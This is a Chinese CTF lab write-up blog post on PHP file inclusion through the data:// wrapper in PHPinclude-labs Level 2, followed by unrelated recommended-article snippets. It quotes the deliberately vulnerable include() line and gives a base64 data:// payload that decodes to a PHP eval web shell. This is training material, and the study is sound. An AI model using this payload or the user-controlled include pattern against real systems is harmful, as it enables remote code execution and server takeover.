[HelloCTF]PHPinclude-labs超详细WP-Level 2-data协议

于 2025-03-18 16:30:30 发布
阅读量987 收藏 8
点赞数 25
分类专栏: [Hello-CTF]PHPinclude-labs WP 文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39673370/article/details/146345329
版权

源码分析

  • 重点关注这两行代码

    • echo include("data://text/plain;base64,4pedKCrigbDilr/igbAqKeKXnEhlbGxvLUNURnd3");

isset($_GET['wrappers']) ? include("data://text/plain".$_GET['wrappers']) : '';

  • 发现这里出现了 data协议

    • data:// - 数据流(RFC 2397)

      • 摘自-> https://da7uran0ir.github.io/2018/07/24/php%E6%94%AF%E6%8C%81%E7%9A%84%E5%8D%8F%E8%AE%AE/data%E5%8D%8F%E8%AE%AE/

      • 依赖

        • allow_url_fopen:On;

        • allow_url_include:On;

        • PHP_Version>=5.2.0

      • data://text/plain;base64,
data:资源类型;编码,内容
data:[<mime type>][;charset=<charset>][;base64],<encoded data>

      • 第一部分是 data: 协议头,它标识这个内容为一个 data URI 资源。

      • 第二部分是 MIME 类型,表示这串内容的展现方式,比如:text/plain,则以文本类型展示,image/jpeg,以 jpeg 图片形式展示,同样,客户端也会以这个 MIME 类型来解析数据。

      • 第三部分是编码设置,默认编码是 charset=US-ASCII,即数据部分的每个字符都会自动编码为 %xx,

        • 关于编码的测试,可以在浏览器地址框输入分别输入下面两串内容,查看

        • 效果:// output: ä½ å¥½             ->使用默认的编码展示,故乱码
data:text/html,你好  
// output: 你好 -> 使用 UTF-8 展示
data:text/html;charset=UTF-8,你好
// output: 浣犲ソ -> 使用 gbk 展示(浏览器默认编码 UTF-8,故乱码)
data:text/html;charset=gbk,你好
// output: 你好 -> UTF-8 编码,内容先使用 base64 解码,然后展示
data:text/html;charset=UTF-8;base64,5L2g5aW9

      • 第四部分是 base64编码设定,这是一个可选项,base64 编码中仅包含0-9,a-z,A-Z,+,/,=,其中 = 是用来编码补白的。

      • 最后一部分为这个Data URI承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容。

      • data:,<文本数据>
data:text/plain,<文本数据>
data:text/html,<HTML代码>
data:text/html;base64,<base64编码的HTML代码>
data:text/css,<CSS代码>
data:text/css;base64,<base64编码的CSS代码>
data:text/javascript,<Javascript代码>
data:text/javascript;base64,<base64编码的Javascript代码>
data:image/gif;base64,base64编码的gif图片数据
data:image/png;base64,base64编码的png图片数据
data:image/jpeg;base64,base64编码的jpeg图片数据
data:image/x-icon;base64,base64编码的icon图片数据

  • 而第一句给出了一个演示

    • 先把 4pedKCrigbDilr/igbAqKeKXnEhlbGxvLUNURnd3 base64编码 解密出来看看, 如下

      • ◝(⁰▿⁰)◜Hello-CTFww

    • 而这句代码就是通过 data协议 将上述内容传递给 include() 函数

  • 而第二句则是把 GET 参数 wrappers 通过 data协议的方式 传递给 include() 函数

    • 并且通过 text/plain; 限制了文本类型

解题分析

  • 为了获取flag, 我们是否可以通过 data协议 传递一句话木马给 include()

  • 先拿 <?php phpinfo();?> 举例, 构造 Payload

    • data://text/plain,<?php phpinfo();?>

    • 而我们需要传参的只有 ,<?php phpinfo();?>

    • image.png

    • 当然也可以把 <?php phpinfo();?> base64编码 后再传, 比如

      • data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

解题步骤

  • 尝试传入一句话木马

    • data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbJ2hlbGxvY3RmJ10pOz8+

    • 或者也可以传入未经过 base64编码 的

    • 记得对 Payload 进行URL编码

  • 然后再同时执行一句话木马

  • image.png

[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 九十三.《Windows黑客编程技术详解》之木马开机自启动技术(注册表、计划任务、系统服务)
热门推荐
杨秀璋的专栏
08-15 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第四篇文章主要介绍木马病毒自启动技术,包括注册表、快速启动目录、计划任务和系统服务,希望对您有所帮助。
PHP url传值
weixin_42649639的博客
12-14 665
file_get_contents($k1)===“Hello World!”) data:,&amp;lt;文本数据&amp;gt; data:text/plain,&amp;lt;文本数据&amp;gt; data:text/html,&amp;lt;html代码&amp;gt; data:text/html;base64,&amp;lt;base64编码的html代码&amp;gt; data:text/css,&amp;
PHP页面URL传值给控制器,PHP的url传值
weixin_32869687的博客
03-10 388
重点是URL传值的编码格式:出现的问题;不论是PHP文件内容,PHP文件,还是html文件......都是设置的统一的编码格式(utf-8),但是我在浏览器地址栏输入的URL地址是www.XXXXX.com/index.php?m=Index&a=index&text=你好,按照理解,$_GET['text']=‘你好’;但是显示时得到的是乱码:“以方框表示的”;解决:$data ...
php url传递url
IT技术宅-北方的刀郎
07-06 337
url 可以base64_encode 后再传值,接受页面再 decode <?php //http://local.test.com/?a=1&url=http://www.baidu.com?b=2&c=3 var_dump($_GET); /*array (size=3) 'a' => string '1' (length=1) 'url' => string 'http://www.baidu.com?b=2' (length=24) 'c' =&.
PHP中url传参
code wars
03-29 2116
8.9 Volist标签   Volist标签主要用于在模板中循环输出数据集或者多维数组。volist标签(循环输出数据)闭合非闭合标签属性name(必须):要输出的数据模板变量id(必须):循环变量offset(可选):要输出数据的offsetlength(可选):输出数据的长度key(可选):循环的key变量,默认值为imod(可选):对key值取模,默认为2empty(可选):如果数据为空显...
OverTheWire的natas游戏(21-34)
qq_40710190的博客
07-18 968
natas solution(21-34) Natas Level 20 → Level 21 Username: natas21 URL: http://natas21.natas.labs.overthewire.org 这一关涉及到一个共享session的知识点,算是本关的收获吧。 进入页面后看到提示 Note: this website is colocated with http://natas21-experimenter.natas.labs.overthewire.org 在看
RedTiger‘s Hackit
Alita_lxz的博客
11-02 1600
RedTiger’s Hackit http://redtiger.labs.overthewire.org/ Level 1 Simple SQL-Injection 打开对应连接,是一个登录页面,先是告诉我们登录的用户名是什么,然后给了一个提示,把表名level1_users给出来了,现在就是要找注入点在哪里了,看到Category:后的1可以点击 点击之后出来cat=1,这就很明显了 试了一大顿,发现这个1后竟然不需要闭合引号,根据order by 得出表有4列 本来想爆一下列名,可能是有参数被
php通过表单或URL传递值
最新发布
sheji888的专栏
09-19 941
表单(Form)是HTML的一部分,用于收集用户输入。在Web应用程序中,表单经常用于注册、登录、搜索或提交其他类型的数据。表单中的数据可以通过POST或GET方法发送到服务器,并由PHP脚本处理。GET方法:通过URL传递数据,适用于搜索查询和页面导航,但不适合传递敏感信息(如密码),因为数据会暴露在URL中。POST方法:通过HTTP请求的主体部分发送数据,适合提交大量数据或敏感信息。
php中url地址栏传参数中文乱码解决方法汇总
07-16
php中url地址栏传参数中文乱码解决方法汇总
php获取url传递的参数,php 解析url获取参数
weixin_29176179的博客
03-09 517
我们可以使用php自带的parse_url和parse_str方法来实现将url中的参数获取出来1:parse_url方法是解析url并返回url的组成部分,例:$url = 'https://www.wj0511.com/site/index.html?page=3&per-page=10';var_dump(parse_url($url));返回结果如:array(4) {["sche...
PHP页面传值
Miracle Fan的博客
07-11 676
前端页面: 后端页面login.php通过前端的input输入框选择的数据,从后端通过选定的method方式进行调用 2.< a >链接传值 在所有类似href链接都可以使用如下形式进行传值调值。前端:可通过字符串函数进行拼接调用传值。 后端调取值:传输过程中网址如下,可看到多的相应通过GET方式调取。 3.Cookie和Session Cookie是相当于在本地自动生成一个cookie文件用于存储数据,在文件到失效时间后会自动删除。session类似于cookie会生成一个随机id作为session的文件
php如何获取url的参数
php 工厂
02-16 1534
$test = parse_url("http://localhost/index.php?name=tank&sex=1#top"); print_r($test); /* 结果如下 Array (      [scheme] => http //使用什么协议      [host] => localhost //主机名      [path] => /index.php //路
php 链接如何传入值,如何将链接的值传递给pahe2.php
weixin_28931507的博客
04-15 167
取决于正是你正在尝试做的,你能做到在两个方面。根据您所描述的内容以及您对Sessions的评论,您可以使用会话在页面之间传递信息。session_start();$_SESSION['displayname'] = $res["displayname"];$_SESSION['title'] = $res["title"];$_SESSION['department'] = $res["depar...
url 和 php变量传值的关系
weixin_30492601的博客
05-04 89
QUERY --变量http://localhost/index.php?a=b&q=cc&desti=abc ------------- array(3) { ["a"]=> string(1) "b" ["q"]=> string(2) "cc" ["desti"]=> string(3) "abc" } ---...
php页面之间传值_php 页面之间传值的三种方法实例代码
weixin_39639040的博客
02-02 175
在项目开发中经常见到不同页面之间传值在web工作中,本篇文章给大家列出了三种常见的方式。一. POST传值post传值是用于html的表单跳转的方法,很方便使用。例如:form中的action填入的是跳转页面的url路径,method填入post方法。form表单中的提交按钮按下后,就会把form中有name的内容都传到填入的url中,可以通过$_POST['name']获取,例如:$a=$_PO...
php页面之间传值_PHP文件之间传值的四种方式说明
weixin_39826809的博客
01-14 938
. POST传值post传值是用于html的表单跳转的方法,很方便使用。例如:form中的action填入的是跳转页面的url路径,method填入post方法。form表单中的提交按钮按下后,就会把form中有name的内容都传到填入的url中,可以通过$_POST['name']获取,例如:$a=$_POST['name1'];$b=$_POST['name2'];?>这里有个很方便的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Haicaji

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值